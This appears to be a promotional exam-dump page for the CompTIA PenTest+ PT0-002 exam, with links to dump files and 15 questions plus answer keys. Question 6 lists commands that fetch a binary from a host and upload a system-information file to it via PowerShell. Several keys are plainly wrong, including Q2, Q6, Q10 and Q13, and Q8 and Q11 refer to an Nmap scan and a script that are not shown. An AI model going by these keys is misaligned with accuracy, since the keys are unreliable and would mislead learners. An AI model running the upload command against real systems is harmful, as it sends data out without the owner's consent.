New PT0-002 dumps contain 162 exam questions and answers and are the best material for preparing for the CompTIA PenTest+ certification exam.
Use the PT0-002 dumps at https://www.leads4pass.com/pt0-002.html: select the latest updated PT0-002 dumps PDF, PT0-002 dumps VCE, or "PDF + VCE" to help candidates pass the CompTIA PenTest+ certification exam with ease.
Download the free shared PT0-002 dumps PDF: https://drive.google.com/file/d/17L47_KDIP0cQJapPpfYFN5yjBJBkT3Wg/
Read the latest free PT0-002 Dumps exam questions and answers online:
Number of exam questions | Exam name | From | Release time | Last updated |
15 | CompTIA PenTest+ Certification Exam | Lead4Pass | Dec 15, 2022 | PT0-002 dumps |
New Question 1:
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.
Correct Answer: C
New Question 2:
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
Correct Answer: C
Reference: https://www.hindawi.com/journals/scn/2018/3794603/
New Question 3:
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C
New Question 4:
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.
Correct Answer: C
New Question 5:
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
Correct Answer: C
New Question 6:
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
Correct Answer: B
Reference: https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842
New Question 7:
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
Correct Answer: A
Reference: https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security-protocols
New Question 8:
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
Network management interfaces are available on the production network. An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.
Correct Answer: CE
New Question 9:
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Correct Answer: A
Reference: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/
New Question 10:
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
A. RFID cloning
B. RFID tagging
C. Meta tagging
D. Tag nesting
Correct Answer: C
New Question 11:
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
A. Look for open ports.
B. Listen for a reverse shell.
C. Attempt to flood open ports.
D. Create an encrypted tunnel.
Correct Answer: A
New Question 12:
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal.
Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site.
Which of the following recommendations would BEST address this situation?
A. Implement a recurring cybersecurity awareness education program for all users.
B. Implement multifactor authentication on all corporate applications.
C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
D. Implement an email security gateway to block spam and malware from email communications.
Correct Answer: A
Reference: https://resources.infosecinstitute.com/topic/top-9-free-phishing-simulators/
New Question 13:
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. Scapy
D. hping3
Correct Answer: A
New Question 14:
A penetration tester is reviewing the following SOW prior to engaging with a client:
“Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”
Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
D. Seeking help with engagement in underground hacker forums by sharing the client's public IP address
E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
F. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
Correct Answer: CE
New Question 15:
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
A. Aircrack-ng
B. Wireshark
C. Wifite
D. Kismet
Correct Answer: A
Reference: https://purplesec.us/perform-wireless-penetration-test/
…